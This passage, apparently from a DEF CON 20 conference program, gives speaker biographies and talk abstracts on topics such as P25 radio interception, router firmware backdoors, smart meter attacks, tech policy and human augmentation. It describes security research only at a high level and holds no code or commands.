Critical Infrastructure Assurance Office (CIAO), where he led a team of 40 dedicated professionals in developing,
coordinating and implementing the Administration's National Security for Critical Infrastructure Protection initiative
and the National Cyber Security Strategy to address potential threats to the nation's critical infrastructures.
From 1994 to 2001, Mr. Marshall served with distinction as the Associate General Counsel for Information Systems
Security/Information Assurance, Office of the General Counsel, National Security Agency. In that capacity, Mr.
Marshall provided advice and counsel on national security telecommunications and technology transfer policies
and programs, national security telecommunications technical security programs, the National Information
Assurance Partnership, the Common Criteria Mutual Recognition Arrangement, legislative initiatives and
international law. Mr. Marshall was the legal architect for the Joint Chiefs of Staff directed exercise "Eligible
Receiver 97" that spotlighted many of the cyber-vulnerabilities of our nation's critical infrastructures and helped
bring focus on this issue at the national leadership level.
Mr. Marshall graduated from The Citadel with a B.A. in Political Science; Creighton University School of Law with
a J.D. in Jurisprudence; Georgetown School of Law with an LL.M. in International and Comparative Law; was a Fellow
at the National Security Law Institute, University of Virginia School of Law in National Security Law; attended
the Harvard School of Law Summer Program for Lawyers; the Georgetown University Government Affairs Institute on
Advanced Legislative Strategies and participated in the Information Society Project at Yale Law School and in the
Privacy, Security and Technology in the 21st Century program at Georgetown University School of Law.
Jerry Dixon currently serves as Director of Analysis for Team Cymru and
was the former Director of the National Cyber Security Division (NCSD) & US-CERT, of the Department of
Homeland Security. He continues to advise partners on national cyber-security threats,
aides organizations in preparing for cyber-attacks, and assists with the development of
cyber-security policies for organizations.
Mischel Kwon is an IT executive with more than 29 years of experience ranging from
application design and development, network architecture and deployment, Information
Assurance policy, audit and management, technical defensive security, large wireless
system security, to building organizational and national level Computer
Emergency/Incident Response/Readiness Teams.
Ms. Kwon currently serves as the President of Mischel Kwon Associates, a security
consulting firm specializing in Technical Defensive Security, Security Operations and
Information Assurance.
Most recently, as the Vice President of Public Sector Security for RSA Security, Ms.
Kwon was responsible for leading RSA in assisting the public sector security solutions,
strategies, technologies and policy.
Ms. Kwon was named the Director for the United States Computer Emergency
Readiness Team (US-CERT) in June 2008 where she spearheaded the organization
responsible for analyzing and reducing cyber threats and vulnerabilities in federal
networks, disseminating cyber threat warning information and coordinating national
incident response activities.
Kwon brings a unique blend of hands on experience, academic research and training,
and a seasoned understanding of how to build operational organizations from inception.
Among her successes at the United States Department of Justice (DOJ), where she
was Deputy Director for IT Security Staff; she built and deployed the Justice Security
Operations Center (JSOC) to monitor and defend the DOJ network against cyber
threats.
Ms. Kwon holds a Master of Science in Computer Science and a graduate certificate in
Computer Security and Information Assurance. In addition, she serves as an adjunct
professor at George Washington University in Washington, DC, where Ms. Kwon also
runs the GW Cyber Defense Lab.
Riley Repko remains committed to building the ‘knowledge-bridge’ between the
innovator (the solver) with the requirement (the seeker). He has a long history of working with
innovative small and medium sized companies and entrepreneurs leveraging his know-how to drive
business. A constant and responsive connector, he is most comfortable strategizing with key
industry decision-makers at the highest levels of government, between leading-edge cyber
solution providers, venture capitalists, the white-hat 'wizards' and the R&D community.
Today, Riley serves as both a cyber-secuirty consultant and a Senior Research Fellow in Cyber
Security for Virginia Tech, and as an affiliated faculty member with the Ted and Karyn Hume
Center for National Security and Technology. Prior to joining Virginia Tech, Mr Repko served
as the senior advisor for cyber operations for both the United States Air Force and to the
Office of the Undersecretary for Cyber Policy within the Department of Defense.
Dr. Linton Wells II is the Director of the Center for Technology and National
Security Policy (CTNSP) at National Defense University (NDU). He is also a Distinguished Research
Professor and serves as the Transformation Chair. Prior to coming to NDU he served in the Office
of the Secretary of Defense (OSD) from 1991 to 2007, serving last as the Principal Deputy Assistant
Secretary of Defense (Networks and Information Integration). In addition, he served as the Acting
Assistant Secretary and DoD Chief Information Officer for nearly two years. His other OSD positions
included Principal Deputy Assistant Secretary of Defense (Command, Control, Communications and
Intelligence-C3I) and Deputy Under Secretary of Defense (Policy Support) in the Office of the
Under Secretary of Defense (Policy).
In twenty-six years of naval service, Dr. Wells served in a variety of surface ships, including command of
a destroyer squadron and guided missile destroyer. In addition, he acquired a wide range of experience in
operations analysis; Pacific, Indian Ocean and Middle East affairs; and C3I. Recently he has been focusing
on STAR-TIDES, a research project focusing on affordable, sustainable support to stressed populations and
public-private interoperability.
Dr. Wells was born in Luanda, Angola, in 1946. He was graduated from the United States Naval Academy in 1967
and holds a Bachelor of Science degree in physics and oceanography. He attended graduate school at The Johns
Hopkins University, receiving a Master of Science in Engineering degree in mathematical sciences and a PhD in
international relations. He is also a 1983 graduate of the Japanese National Institute for Defense Studies in
Tokyo, the first U.S. naval officer to attend there.
Dr. Wells has written widely on security studies in English and Japanese journals. He co-authored Japanese
Cruisers of the Pacific War, which was published in 1997 and co- edited Crosscutting Issues in International
Transformation, published in 2009. His hobbies include history, the relationship between policy and
technology, and scuba diving. He has thrice been awarded the Department of Defense Medal for
Distinguished Public Service.
Mark Weatherford is the Deputy Under Secretary for Cybersecurity for
the National Protection and Programs Directorate (NPPD), a position that will allow DHS
NPPD to create a safe, secure, and resilient cyberspace. Weatherford has a wealth of
experience in information technology and cybersecurity at the Federal,
State and private sector levels.
Weatherford was previously the Vice President and Chief Security Officer of the North American
Electric Reliability Corporation (NERC) where he directed the cybersecurity and critical
infrastructure protection program. Before NERC, Weatherford was with the State of California where
he was appointed by Governor Arnold Schwarzenegger as the state’s first Chief Information Security
Officer. Prior to California, he served as the first Chief Information Security Officer for the
State of Colorado, where he was appointed by two successive governors. Previously, as a member of
the Raytheon Company, he successfully built and directed the Navy/Marine Corps Intranet Security
Operations Center (SOC) in San Diego, California, and also was part of a team conducting security
certification and accreditation with the U.S. Missile Defense Agency. A former U.S. Navy
Cryptologic Officer, Weatherford led the U.S. Navy’s Computer Network Defense operations and
the Naval Computer Incident Response Team (NAVCIRT).
Weatherford earned a bachelor’s degree from the University of Arizona and a master’s
degree from the Naval Postgraduate School. He also holds the Certified Information Systems
Security Professional (CISSP) and Certified Information Security Manager (CISM) certifications.
He was awarded SC Magazine’s prestigious “CSO of the Year” award for 2010 and named one of the
10 Most Influential People in Government Information Security for 2012 by GovInfo Security.
Marcus Sachs is a retired Army officer and was also a presidential appointee to
the White House Office of Cyberspace Security in 2002-2003. While at the White House he authored
parts of the National Strategy to Secure Cyberspace, and proposed the creation of what ultimately
became the US-CERT at DHS.
During his Army career he was well known for tinkering with things technical and often found ways to
circumvent traditional controls and constraints to achieve mission success. An avid ham radio operator,
he was the custodian of two different MARS stations and helped with the engineering of large X.25 packet
switching networks in the 1980s long before Netscape and the Internet came along. In 1994 he became known
as the Voodoo Switchdoctor thanks to his expertise in building and running secure data networks in Haiti
that supported military operations there. In 1998 he was selected by the SECDEF to be an initial member
of the DoD's Joint Task Force for Computer Network Operations, where he served until he retired at the end of
2001. At the JTF he spent time chasing malicious actors at all levels, from script-kiddie hackers to
terrorists to nation states that were attempting to do harm to DoD networks. After leaving government in
2003 he volunteered as the director of the SANS Internet Storm Center for seven years and became well
known at Defcon for sporting his motorcycle leather in the Las Vegas heat.
Currently at Verizon, Marcus now serves on several public-private working groups in the Washington D.C.
area and is a frequent speaker at both technical as well as policy centric events and workshops. He holds
degrees in Civil Engineering, Computer Science, and Science and Technology Commercialization, and is currently
pursuing a Ph.D. in Public Policy. He authored and teaches a three-day course in Critical Infrastructure
Protection at the SANS Institute and is a licensed Professional Engineer in the Commonwealth of Virginia.
Mr. Rob Joyce is the Deputy Director of the Information Assurance Directorate (IAD) at the
National Security Agency. His organization is the NSA mission element charged with providing products and
services critical to protecting our Nation’s systems that carry classified communications, military command
and control or intelligence information. IAD provides technical expertise on cyber technologies, cryptography,
security architectures and other issues related to information assurance, as well as supplying deep understanding
of the vulnerability and threats to national security systems.
Mr. Joyce has spent more than 23 years at NSA, beginning his career as an engineer. He holds a Bachelors Degree in
Electrical and Computer Engineering from Clarkson University a Masters Degree in Electrical Engineering from Johns
Hopkins. Throughout his career with NSA, he has been the recipient of two Presidential Rank Awards, one
meritorious and one at the distinguished level.
SIGINT and Traffic Analysis for the Rest of Us
Sandy Clark University of Pennsylvania
Matt Blaze Professor and Lab Director, University of Pennsylvania
Matt Blaze Professor and Lab Director, University of Pennsylvania
Last year, we discovered practical protocol weaknesses in P25, a "secure"
two-way radio system used by, among others, the federal government to manage surveillance and
other sensitive law enforcement and intelligence operations. Although some of the problems are
quite serious (efficient jamming, cryptographic failures, vulnerability to active tracking of
idle radios, etc), many of these vulnerabilities require an active attacker who is able and
willing to risk transmitting. So we also examined passive attacks, where all the attacker
needs to do is listen, exploiting usability and key management errors when they occur. And
we built a multi-city networked P25 interception infrastructure to see how badly the P25
security protocols do in practice (spoiler: badly).
This talk will describe the P25 protocols and how they failed, but will focus on the architecture and
implementation of our interception network. We used off-the-shelf receivers with some custom software
deployed around various US cities, capturing virtually every sensitive, but unintentionally clear
transmission (and associated metadata) sent by federal agents in those cities. And by systematically
analyzing the captured data, we often found that the whole was much more revealing than the sum of the parts.
Come learn how to set up your own listening-post.
Sandy 'Mouse' Clark Sandy Clark (Mouse) has been taking things
apart since the age of two, and still hasn't learned to put them back together. An active member of the
Hacker community, her professional work includes an Air Force Flight Control Computer, a simulator for
NASA and singing at Carnegie Hall, and a minor in history. She is (still) at the University of Pennsylvania.
A founding member of Toool-USA, she also enjoys puzzles, toys, Mao (the card game), and anything that
involves night vision goggles. Her research explores human scale security, modeling the attacker/defender
ecosystem and the unexpected ways that systems interact.
Twitter: @sa3nder
Google Plus: Sandy_Clark
Matt Blaze directs the Distributed Systems Lab at the
University of Pennsylvania, where he teaches hackers to be scientists and scientists to be hackers.
Twitter: @mattblaze
http://www.crypto.com
Bad (and Sometimes Good) Tech Policy: It's Not Just a DC Thing
Chris Conley Technology & Civil Liberties Policy Attorney, ACLU of Northern California
Efforts at the federal level to pass laws like SOPA and CISPA and require that tech companies
build backdoors into their services for law enforcement use have attacted widespread attention and criticism, and
rightly so. But DC is far from the only place that officials are making decisions that impact the privacy and free
speech rights of tech users. State and local officials are jumping into the fray as well, passing laws or creating
policies that have immediate impact without the spotlight that accompanies federal action.
In this talk, I will survey several areas where state and local officials have recently been active, including warrantless
location tracking, searches of student and employee devices and online accounts, automated license plate recognition, and
DNA collection. I will highlight some of the best and worst policies coming from state and local officials. Most of all,
I hope to convince you that keeping an eye on -- and even taking time to educate -- your local sheriff or state legislature
may be just as important as protecting your freedoms at the national level.
Chris Conley is the Technology and Civil Liberties Policy Attorney at the
ACLU of Northern California, where his mission is to ensure that emerging technology bolsters rather than erodes
individual privacy and free speech rights. He takes a multidisciplinary approach to protecting civil liberties,
from building apps and other tools that help users better understand and control the flow of their personal
information to working on resources that help businesses build privacy and free speech protections into new
products and services. He has particularly focused on the role that privacy companies can play in
protecting the freedoms of their users.
Prior to joining the ACLU of Northern California, Chris was a Fellow with the Berkman Center for Internet &
Society at Harvard University, where he led research efforts on international Internet surveillance. He previously
worked as a software engineer and data architect for various corporations and non-profits.
Chris holds a B.S.E. in Electrical Engineering from The University of Michigan, a S.M. in Computer Science from the
Massachusetts Institute of Technology, and a J.D. from Harvard Law.
Twitter: @ManConley
Facebook:aclunc
Life Inside a Skinner Box: Confronting our Future of Automated Law Enforcement
Greg Conti Director, Cyber Research Center, West Point
Lisa Shay Ass't Professor, Electrical Engineering & Computer Science, West Point
Woody Hartzog Ass't Professor, Cumberland School of Law, Samford University
From smart pajamas that monitor our sleep patterns to mandatory black boxes in cars to smart trash
carts that divulge recycling violations in Cleveland, virtually every aspect of our lives is becoming instrumented and
increasingly connected to law enforcement, government, and private entities. At the same time, these entities are
incentivized to further collect, process, and punish in the name of financial advantage, public safety, or security.
The trend of automated law enforcement is inescapable and touches every citizen. This talk will explore the
implications of automated law enforcement, study the incentives at play, survey recent advances in sensing and
surveillance technology, and will seek to answer the following questions and more. Were laws written with the
idea of universal and perfect enforcement in mind? What are the implications of living in a society where every
transgression might be detected and punished? What happens to the discretion of the officer on the beat, and the
larger system of law, when we take the human out of the loop? Where does a security savvy, privacy conscious, and
law abiding society end and a police state begin? You'll leave this talk with an awareness of the problem of
automated law enforcement, challenges we face in ensuring such systems are properly constrained, ideas for your
personal research agenda, and tools to help improve the prospects of our collective future.
Greg Conti is Director of West Point's Cyber Research Center. He is the
author of Security Data Visualization (No Starch Press) and Googling Security (Addison-Wesley) as well as over 40
articles and papers covering online privacy, usable security, security data visualization, and cyber warfare. His
work can be found at www.gregconti.com and www.rumint.org.
http://www.gregconti.com/
Lisa Shay is an Assistant Professor in the Department of Electrical Engineering
and Computer Science at the US Military Academy at West Point. She is a Marshall Scholar with an M.Sc. from Cambridge University
and a Ph.D. from Rensselaer Polytechnic Institute, both in Electrical Engineering. She is a Senior Member of the Institute
of Electrical and Electronic Engineers. Her research interests include sensor systems and their implications on individual
and societal privacy and freedom.
Woodrow Hartzog is an Assistant Professor at the Cumberland School of Law at Samford
University and an Affiliate Scholar at the Center for Internet and Society at Stanford Law School. His research focuses on
privacy, human-computer interaction, online communication, and electronic agreements. He holds a Ph.D. in mass communication
from the University of North Carolina at Chapel Hill, an LL.M. in intellectual property from the George Washington University
Law School, and a J.D. from Samford University. He previously worked as an attorney in private practice and as a trademark
attorney for the United States Patent and Trademark Office. He also served as a clerk for the Electronic
Privacy Information Center.
Owning the Network: Adventures in Router Rootkits
Michael Coppola Security Consultant at Virtual Security Research
Routers are the blippy switchy boxes that make up the infrastructure of
networks themselves, yet few administrators actually care to change the
default login on these devices. Interestingly, nearly all consumer (SOHO)
routers allow a user to reflash the device by uploading a (presumably vendor-provided)
firmware image. By abusing this feature, it is possible for an
attacker to craft his or her own malicious firmware image and execute
arbitrary code on the device, granting full control over the OS, the network
it manages, and all traffic passing through it. Additionally, interesting
persistence and pivot opportunities are realized, allowing an attacker to
maintain access or target internal hosts in a covert way.
Based on personal experience, we'll examine the process of backdooring
firmware images for SOHO routers from start to finish. A generalized
technique to backdoor firmware images will be outlined, and a new framework
to abstract and expedite the process will be publicly released. Working
examples will be presented which demonstrate the ability to pop shells, hide
connections, sniff traffic, and create a router botnet of doom.
Michael Coppola is currently an undergraduate student at Northeastern
University and works as a security consultant at Virtual Security Research
in Boston, MA. In past years, he won the U.S. Cyber Challenge NetWars and
MIT Lincoln Lab/CSAIL CTF competitions, and is noted for finding security
bugs in various Google services. His interests include memory
corruption, poking at the Linux kernel, and burning things with a soldering
iron. More information may be found at: www.poppopret.org
Twitter: @mncoppola
World War 3.0: Chaos, Control & the Battle for the Net
Joshua Corman Director of Security Intelligence, Akamai Technologies
Dan Kaminsky
Jeff Moss Founder, DEF CON and Black Hat
Rod Beckstrom
Michael Joseph Gross Author of the Vanity Fair article 'A Declaration of Cyber-War', Moderator
Dan Kaminsky
Jeff Moss Founder, DEF CON and Black Hat
Rod Beckstrom
Michael Joseph Gross Author of the Vanity Fair article 'A Declaration of Cyber-War', Moderator
There is a battle under way for control of the Internet. Some see it as a fight between forces of Order (who want to superimpose existing, pre-digital power structures and their notions of privacy, intellectual property, security, and sovereignty onto the Net) and forces of Disorder (who want to abandon those old structures and let the will of the crowd control a new global culture). Yet this binary view of the conflict excludes the characters with the best chance of resolving it: those who know that control is impossible and chaos is untenable, a group that Vanity Fair, in an article called "World War 3.o," called "the forces of Organized Chaos." This panel gathers leading proponents of that worldview to discuss urgent issues of Internet governance, which may come to a head later this year in a Dubai meeting of the U.N.'s International Telecommunications Union. If government control and anarchistic chaos online are unacceptable, what exactly do the forces of organized chaos propose as an alternative? And what is the DefCon community's role in helping to realize that vision of the Net?
Joshua Corman is the Director of Security
Intelligence for Akamai Technologies and has more than a decade of experience in
security. Most recently he served as Research Director for Enterprise Security at
The 451 Group following his time as Principal Security Strategist for IBM Internet
Security Systems. Mr. Corman’s research highlights adversaries, game theory and
motivational structures. His analysis cuts across sectors to the core security
challenges plaguing the IT industry, and helps to drive evolutionary strategies
toward emerging technologies and shifting incentives.
Twitter: @joshcorman
http://blog.cognitivedissidents.com
Dan Kaminsky: I play with toys
http://dankaminsky.com
Twitter: @dakami
Jeff Moss is the founder of DEF CON and Black Hat.
http://defcon.org
Twitter: @darktangent
Rod Beckstrom is a highly successful entrepreneur,
founder and CEO of a publicly-traded company, a best-selling author, avowed
environmentalist, public diplomacy leader and, most recently, the head of a
top-level federal government agency entrusted with protecting the nation’s
communication networks against cyber attack.
Throughout 2008, Rod served as the Director of the National Cybersecurity
Center (NCSC) at the U.S. Department of Homeland Security, where he
reported to the Secretary of DHS, and was charged with cooperating
directly with the Attorney General, National Security Council, Secretary
of Defense, and the Director of National Intelligence (DNI). Prior to
joining DHS, he served on the DNI’s Senior Advisory Group. Rod is unique
in having experienced the inner workings of two, highly-charged, often
competing, federal security agencies created in the wake of the September
11th attacks, an event that he says, “changed my life.”
Rod is widely regarded as a pre-eminent thinker and speaker on issues of
cybersecurity and related global issues, as well as on organizational
strategy and leadership. He is also an expert on how carbon markets
and “green” issues affect business. While Director of the NCSC, Rod
developed an effective working group of leaders from the nation's
top six cybersecurity centers across the civilian, military and
intelligence communities. His work led to his development of a new
economic theory that provides an explicit model for valuing any network,
answering a decades-old problem in economics.
Michael Joseph Gross is an American author and journalist.
He is a contributing editor to Vanity Fair, where he covers topics including politics,
technology, and national security. He has also written extensively for publications such as
The New York Times, The Boston Globe, and GQ. Gross is the author of the book Starstruck: When a
Fan Gets Close to Fame, published in 2006 by Bloomsbury Publishing.
Gross attended Williams College, and later studied at Princeton Theological Seminary. After
graduating, he wrote speeches for Massachusetts Governor William Weld.
Twitter: @M_J_Gross
Embedded Device Firmware Vulnerability Hunting Using FRAK, the Firmware Reverse Analysis Konsole
Ang Cui Red Balloon Security
We present FRAK, the firmware reverse analysis konsole. FRAK is a framework for
unpacking, analyzing, modifying and repacking the firmware images of proprietary embedded devices. The
FRAK framework provides a programmatic environment for the analysis of arbitrary embedded device firmware
as well as an interactive environment for the disassembly, manipulation and re-assembly
of such binary images.
We demonstrate the automated analysis of Cisco IOS, Cisco IP phone and HP LaserJet printer firmware
images. We show how FRAK can integrate with existing vulnerability analysis tools to automate bug
hunting for embedded devices. We also demonstrate how FRAK can be used to inject experimental host-based
defenses into proprietary devices like Cisco routers and HP printers.
Ang Cui is the founder of Red Ballon Security Inc., which specializes
in the development of offensive and defensive technologies for embedded systems. Ang is also currently a
PhD candidate at Columbia University in the Intrusion Detection Systems Laboratory.
Looking Into The Eye Of The Meter
Cutaway InGuardians, Inc.
When you look at a Smart Meter, it practically winks at you. Their
Optical Port calls to you. It calls to criminals as well. But how do
criminals interact with it? We will show you how they look into the eye
of the meter. More specifically, this presentation will show how
criminals gather information from meters to do their dirty work. From
quick memory acquisition techniques to more complex hardware bus
sniffing, the techniques outlined in this presentation will show how
authentication credentials are acquired. Finally, a method for
interacting with a meter's IR port will be introduced to show that
vendor specific software is not necessary to poke a meter in the eye.
This IS the talk that was not presented at ShmooCon 2012 in response to
requests from a Smart Grid vendor and the concerns of several utilities.
We have worked with them. They should be okay with this.....should.....
Cutaway: Jack of All Trades and hardware attack dog for the InGuardians founders.
I specialize in physical and information technology penetration testing,
web assessments, wireless assessments, architecture review, incident
response/digital forensics, product research, hardware research, code
review, security tool development, and the list goes on. I am currently
focusing on hardware research specifically in the technologies
surrounding products comprising the SMART GRID with a focus on
implementing Zigbee protocol API's and microprocessor
disassembers/emulators for research, testing, risk assessment, and
anything else you can think of with these technologies.
Twitter: @cutaway
http://www.cutawaysecurity.com/blog
SQL Injection to MIPS Overflows: Rooting SOHO Routers
Zachary Cutlip Security Researcher, Tactical Network Solutions
Three easy steps to world domination:
- Pwn a bunch of SOHO routers.
- ???
- Profit
I can help you with Step 1. In this talk, I'll describe several 0-day vulnerabilities in Netgear wireless routers. I'll show you how to exploit an unexposed buffer overflow using nothing but a SQL injection and your bare hands. Additionally, I'll show how to use the same SQL injection to extract arbitrary files from the file systems of the wifi routers. This presentation guides the audience through the vulnerability discovery and exploitation process, concluding with a live demonstration. In the course of describing several vulnerabilities, I present effective investigation and exploitation techniques of interest to anyone analyzing SOHO routers and other embedded devices.
Zachary Cutlip is a security researcher with Tactical Network Solutions, in Columbia, MD. At TNS, Zach develops exploitation techniques targeting embedded systems and network infrastructure. Since 2003, Zach has worked either directly for or with the National Security Agency in various capacities. Before becoming a slacker, he spent six years in the US Air Force, parting ways at the rank of Captain. Zach holds an undergraduate degree from Texas A&M University and a master's degree from Johns Hopkins University.
Twitter:@zcutlip
DC RECOGNIZE Awards
Hosts:
Jeff Moss Founder, DEF CON and Black Hat
Jericho
Russ Rogers Contest Guru
DEF CON is proud to announce the 2nd annual DEF CON awards ceremony,
renamed the DC Recognize Awards. These awards are given to deserving individuals in the community,
industry, and media.
You voted, so come see who made the cut. The categories we're giving out awards in are:
- Worst coverage of security/hacker related issues by a media person or outlet (Print Media)
- Worst coverage of security/hacker related issues by a media person or outlet (Broadcast Media)
- Best privacy enhancing technology for the last 12 months
- Best security or hacker related Twitter feed
- The "Twit Twat" award for the worst security or hacker related Twitter feed
- The "Captain Obvious" award for the most "common sense" BS talk at DEF CON 20.
(no noms before the con, obvs.)
- The "Security Charlatan of the Year" award
Hacking Humanity: Human Augmentation and You
Christian "quaddi" Dameff Third Year Medical Student
Jeff "r3plicant" Tully Third Year Medical Student
You've played Deus Ex. You've seen Robocop. You've read Neuromancer.
You've maybe even wondered just what dark mix of technology and black magic keeps the
withered heart of Richard "Dick" Cheney pumping coronary after coronary. Now it's time
to get off the couch and put down the controller. Human augmentation is no longer
constrained to the world of speculative fiction and vice-presidential medicine;
biomechanical interfaces are an exploding area of active research, development, and implementation. And they're here to stay.
Join medical student/hacker enthusiasts quaddi and r3plicant for a fun-filled tour
through the brave new world of the latest and greatest in this exciting new melding
of medicine and technology. From the simplest insulin pump to the latest gyroscopic
prosthesis for wounded veterans, from the full body DARPA developed exoskeleton of the
future to the changes currently being implemented in our most fundamental building blocks,
this talk explores what was, what is and what will be in the future of human augmentation,
and more importantly, what you need to know to get started down the path to Robocop glory.
Christian "quaddi" Dameff is a third year medical student and former
OCTF champion (Sudoers). Former research and interests include: therapeutic hypothermia after cardiac
arrest (brrr!), novel drug targets for post Myocardial Infarction patients, and the future of medicine
in enhancing the human condition. This is his eighth DEF CON.
Jeff "r3plicant" Tully is a third year medical student who
is fascinated by the intersections of healthcare and informatics and the promise such relationships
have to revolutionize the practice of medicine. A microbiologist with an undergraduate degree in
biochemistry, Jeff's thesis project at the Biodesign Institute at ASU involved "hacking" the
genome of Salmonella bacteria to produce novel strains for anti-cancer treatments. This is
his second DEF CON and he looks forward to many more.
Connected Chaos: Evolving the DCG/Hackspace Communication Landscape
Panelists:
Blakdayz Moderator
Anarchy Angel
Anch
Dave Marcus
Nick Farr
Blakdayz Moderator
Anarchy Angel
Anch
Dave Marcus
Nick Farr
As hackers, we have access to tremendous informational power. At our
individual hackerspaces and DCGs we build communities of like minded
hackers that push the limits of technology. But have we gone far
enough in building a global hacking community that celebrates
diversity and unleashes world-changing genius?
We can accelerate the opportunity for community and change through
technology. Take a seat and hear what resources are available to the
groups and hackspaces in your area. By connecting our chaos, we can
transcend the isolation and polarization that dominates much of our
communities. We can unite and empower. Join the discussion and chaos
so we can evolve the way our community will be connected.
How do you change the world? One connected hacker, hackerspace and DCG
at a time.
Blakdayz DC225 - pwns the NSA while sleeping
Twitter: @blakdayz
Facebook: blak dayz
Anarchy Angel I be pimpin hoes
Twitter: @anarchyang31, @dc414
G+: dc414
Anch
Dave Marcus Picker of locks, hacker of the
corporate ladder, lifter of heavy things
Twitter: @DaveMarcus
Nick Farr The Johnny Appleseed of Hackerspaces
Not-So-Limited Warranty: Target Attacks on Warranties for Fun and Profit
Darkred
Frequently people consider a serial number as nothing but a number but in this
presentation you will be shown the multitude of ways in which an attacker could utilize serial
numbers to hurt you,to hurt companies as well as to track your movements. A brief primer on the
function and use of serial numbers in the real world will be provided. Focusing on Apple, Amazon
and Pringles and providing in-depth insight into the varying degrees of trust a serial number
will gain you. Attack vectors ranging from Apple to Pringles and everywhere in between along with
points about how to prevent similar tragedies from occurring with your product.
Darkred is a high-school student currently residing in
the United States. In his free time, he enjoys testing the vulnerabilities of companies' security and
warranty policies. He does this in order to make said companies aware of serious flaws in their
policies. His tests range from High Value Electronics to free coupons for soda and chips.
With this information, he hopes that big companies like Apple can protect their warranty
policies and their consumers.
DivaShark - Monitor your Flow
Robert Deaton
Analyzing live network traffic is nothing new but the tools still
seem limited. Wireshark is great for post capture analysis but when the packets are
coming at you live, nothing currently gives your stream or session level visibility.
How many times have you clicked 'Follow this stream' just to have that stream update
and you have to reprocess the entire PCAP? That's great when it's just your machine
but when you're monitoring a network, it limits your view and is a pain. As more
traffic adds, this problem grows and makes life for your little netbook
quite painful. Enter DivaShark - your live packet capture solution.
**pause for uproarious applause and standing ovation**
DivaShark is designed around live packet capture analysis. It breaks traffic down into
connections/flows and lets you process them independently. It continues to parse the data as
it comes in so that you can pay attention to the data you really care about. It's design
allows you to perform processing live per stream and perform actions like extraction of
files or images. This project really came about after frustration with Wireshark while
playing Capture the Packet the past two years and is an answer to this sort of situation.
What I'm proposing is that someone can kill capture-the-packet with this tool w
ithout breaking a sweat (yes this might be a challenge).
Robert Deaton is a new guy on the
block who has been sitting on the sideline for the last several years. While
his focus has mainly been in math and physics, computer science and security has
always been a passion he holds close. After recently getting back into the arena
he has set out to make his life easier by writing tools that automate things for him.
When he's not drinking with friends, out catching a concert, or thrill seeking on a
snowboard or mountain bike, he can be found moderating numerous subreddits and
complaining about human stupidity while he does it.
Beyond the War on General Purpose Computing: What's Inside the Box?
Cory Docotorow Author, Activist, Blogger, Co-Editor of BoingBoing.net
Assuming the failure of all the calls to regulate PCs and the Internet because
people might do bad things with them, what then? Civil war, that's what. The su/user split we inherited
from multiuser systems has given us a false intuition: that owners of computers, and not their users,
should set policy on them. How will that play out when your car, house, legs, ears and heart are driven
by computers that you don't own?
Cory Doctorow (craphound.com) is a science fiction author,
activist, journalist and blogger -- the co-editor of BoingBoing (boingboing.net) and the
author of Tor Teens/HarperCollins UK novels like FOR THE WIN and the bestselling LITTLE BROTHER. He is the former
European director of the Electronic Frontier Foundation and co-founded the UK Open Rights Group. Born in Toronto, Canada, he now lives in London.
Sploitego - Maltego's (Local) Partner in Crime
Nadeem Douba Cygnos IT Security
Have you ever wished for the power of Maltego when performing internal
assessments? Ever hoped to map the internal network within seconds? Or that Maltego had a
tad more aggression? Sploitego is the answer. In the presentation we'll show how we've carefully
crafted several local transforms that gives Maltego the ooomph to operate nicely within internal
networks. Can you say Metasploit integration? ARP spoofing? Passive fingerprinting? SNMP hunting?
This all is Sploitego. But wait - there's more. Along the way we'll show you how to use our awesome
Python framework that makes writing local transforms as easy as 'Hello World'.
Sploitego makes it easy to quickly develop, install, distribute, and maintain Maltego Local transforms. The
framework comes with a rich set of auxiliary libraries to aid transform developers with integrating attack,
reconnaissance, and post exploitation tools. It also provides a slew of web tools for interacting with public
repositories.
Sploitego and its underlying Python framework will be released at DEF CON as open source - yup - you can extend
it to your heart's content. During the presentation we'll show the awesome power of the tool with live demos
and scenarios as well as fun and laughter.
Nadeem Douba - GWAPT, GPEN: Currently situated in the
Ottawa (Ontario, Canada) valley, Nadeem is a senior research analyst at Cygnos Information Security
(a Raymond Chabot Grant Thornton company). Nadeem provides technical security consulting services
to various clients in the health, education, and public sectors. Nadeem has been involved within
the security community for over 10 years and has frequently presented at ISSA and company sponsored
seminars and training sessions. He is also an active member of the open source software community
and has contributed to projects such as libnet, Backtrack, and Maltego.
Not So Super Notes, How Well Does US Dollar Note Security Prevent Counterfeiting?
Matthew Duggan Member of Technical Staff, VMware Inc.
The security of US dollar notes is paramount for maintaining their value and
safeguarding the US and dependent economies. Counterfeiting has historically been a crime of high
sophistication, but has the prevalence of affordable color scanning and printing equipment changed
that? This talk analyzes the security features of US dollars to determine the minimum sized
organization that could successfully execute an attack.
Matthew Duggan holds a Bachelors and Masters degree in
computer science, and has been working as a software engineer for almost 10 years. He enjoys
testing the limits of systems, especially in regards to security. When he is not reading
about security or picking locks he brews beer and watches movies.
Post Metasploitation: Improving Accuracy and Efficiency in Post Exploitation Using the Metasploit Framework
egypt Developer, Rapid7
As many in this community have echoed, shell is just the beginning. Owning a box is all well and good,
but where do you go from there? Everyone has their own secret sauce for furthering their access after gaining a foothold.
This talk will focus on the techniques, from simple to advanced, available for post exploitation using
the Metasploit Framework.
egypt is a software developer for Rapid7 where he is a core
developer for the Metasploit Framework. Before devoting all his time to Metasploit, he was a Cybersecurity
researcher for Idaho National Laboratory where he discovered numerous vulnerabilities in SCADA and Industrial
Control Systems and probably didn't write Stuxnet. egypt has presented at DEF CON, BSidesLV, Black Hat,
Derbycon and other venues. Note that egypt is not Egypt. The two can be distinguished easily by their
relative beards -- Egypt has millions, while egypt only has the one.
Twitter: @egyp7
The Paparazzi Platform: Flexible, Open-Source, UAS Software and Hardware
esden
dotAero
misterj
cifo
dotAero
misterj
cifo
This presentation introduces the Paparazzi framework, an Open-Source
(GPL3 and OSHW CC-by-SA) software and hardware robotics platform focused on Unmanned
Aerial Systems (UASes). Paparazzi’s power and flexibility enable rapid development
and robust control of diverse vehicle types – from fixed-wing airplanes to
multicopters and transitioning aircraft – while its open nature permit
customization and integration with other systems.
We show the capabilities of the platform and some achievements from all around the world
with this platform. We also will show what we are working on and introduce it
to the public.
What will you do with that powerful tool?
The Paparazzi autopilots, a multicopter, and the Quadshot – a VTOL, multirotor,
transitioning flying wing – are presented.
esden received his degree in
Computer Science from the University of Applied Sciences, Rosenheim in
2008 and acted as research assistant at the Intelligent Autonomous Systems
Group at T.U. Munich until 2009. In 2010 he began work at Joby Energy Inc. as an
Embedded Systems and Motor Control Engineer. In 2011 he co-founded Transition Robotics,
Inc. where he serves as the Embedded Systems and Avionics Engineer. He is a long term member
